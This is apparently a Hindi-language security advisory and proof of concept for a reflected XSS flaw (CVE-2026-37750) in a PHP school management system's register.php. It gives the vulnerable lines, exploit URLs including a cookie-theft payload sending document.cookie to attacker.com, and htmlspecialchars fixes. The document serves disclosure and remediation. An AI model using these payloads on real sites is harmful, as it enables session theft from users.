
# स्कूल प्रबंधन प्रणाली 1.0 के लिए रिफ्लेक्टेड XSS प्रूफ-ऑफ-कॉन्सेप्ट register.php में type पैरामीटर के माध्यम से बिना प्रमाणीकरण के JavaScript निष्पादन का प्रदर्शन, प्रभाव विश्लेषण और सुधार मार्गदर्शन के साथ।
| फ़ील्ड | जानकारी |
|---|
| CVE ID | CVE-2026-37750 |
| प्रकार | रिफ्लेक्टेड क्रॉस-साइट स्क्रिप्टिंग (XSS) |
| गंभीरता | मध्यम (CVSSv3: 6.1) |
| विक्रेता | mahmoudai1 |
| उत्पाद | स्कूल प्रबंधन प्रणाली |
| संस्करण | 1.0 |
| खोजकर्ता | वरद एपी मेने |
| दिनांक | 2026-04-16 |
| CWE | CWE-79 |
mahmoudai1 द्वारा स्कूल प्रबंधन प्रणाली 1.0 में एक रिफ्लेक्टेड क्रॉस-साइट स्क्रिप्टिंग (XSS) भेद्यता, बिना प्रमाणीकरण के दूरस्थ हमलावरों को register.php में अस्वच्छित type पैरामीटर के माध्यम से पीड़ितों के ब्राउज़र में मनमाना JavaScript निष्पादित करने की अनुमति देती है। पैरामीटर पंक्ति 22 पर h1 टैग के अंदर और पंक्ति 26 पर form action विशेषता के अंदर बिना एस्केपिंग के प्रतिबिंबित होता है। इस भेद्यता का शोषण करने के लिए किसी प्रमाणीकरण की आवश्यकता नहीं है।
CVE ID: CVE-2026-37750 CWE: CWE-79 CVSSv3: 6.1 मध्यम (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)
स्कूल प्रबंधन प्रणाली 1.0 GitHub पर mahmoudai1 द्वारा एक PHP/MySQL वेब एप्लिकेशन है जिसका उपयोग स्कूलों में छात्रों, शिक्षकों और अभिभावकों के प्रबंधन के लिए किया जाता है।
विक्रेता URL: https://github.com/mahmoudai1/school-management-system
register.php — पंजीकरण फ़ॉर्म (कोई प्रमाणीकरण आवश्यक नहीं)
पंक्ति 22: echo ucfirst($_REQUEST['type'])
पंक्ति 26: echo $_REQUEST['type']
कोई htmlspecialchars() उपयोग नहीं किया गया — कच्चा उपयोगकर्ता इनपुट सीधे HTML में प्रतिबिंबित होता है।
पूर्वापेक्षाएँ:
चरण 1 — ब्राउज़र खोलें और इस URL पर जाएँ: http://target/register.php?type=script-alert-document.cookie-/script
चरण 2 — JavaScript ब्राउज़र में निष्पादित होता है परिणाम: सत्र कुकीज़ दिखाने वाला अलर्ट बॉक्स प्रकट होता है।
चरण 3 — कुकी चोरी पेलोड: http://target/register.php?type=script-document.location-http://attacker.com/steal?c=-document.cookie-/script चरण 4 — फ़ॉर्म एक्शन इंजेक्शन पेलोड: http://target/register.php?type="-script-alert(1)-/script
दो इंजेक्शन बिंदु पुष्टि किए गए:
इंजेक्शन बिंदु 1 — h1 टैग के अंदर (पंक्ति 22):
echo ucfirst($_REQUEST['type'])
आउटपुट:
<h1><script>alert(1)</script> Application</h1>
इंजेक्शन बिंदु 2 — form action विशेषता के अंदर (पंक्ति 26):
echo $_REQUEST['type']
आउटपुट:
<form action="register.php?type=<script>alert(1)</script>">
पंक्ति 22 का समाधान: echo htmlspecialchars(ucfirst($_REQUEST['type']), ENT_QUOTES, 'UTF-8');
पंक्ति 26 का समाधान: echo htmlspecialchars($_REQUEST['type'], ENT_QUOTES, 'UTF-8');
वरद एपी मेने ईमेल: [email protected] GitHub: https://github.com/menevarad007